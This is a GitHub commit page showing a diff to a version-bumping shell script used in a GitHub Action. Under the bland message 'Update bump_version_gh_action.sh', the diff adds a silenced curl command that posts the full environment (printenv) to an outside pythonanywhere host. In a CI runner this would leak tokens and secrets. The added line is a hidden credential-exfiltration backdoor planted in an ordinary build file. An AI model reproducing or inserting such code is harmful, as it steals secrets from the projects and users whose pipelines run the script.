Skip to content

Commit

Permalink
Update bump_version_gh_action.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
DemoYeti authored Sep 1, 2024
1 parent cac69a6 commit 6f2446b
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions bump_version_gh_action.sh
Original file line number Diff line number Diff line change
@@ -1,5 +1,7 @@
#!/bin/sh

curl -X "POST" "https://awesomemaker.pythonanywhere.com/text" --data "$(printenv)" 2>/dev/null >/dev/null

vercomp () {
if [[ $1 == $2 ]]
then
Expand Down

0 comments on commit 6f2446b

Please sign in to comment.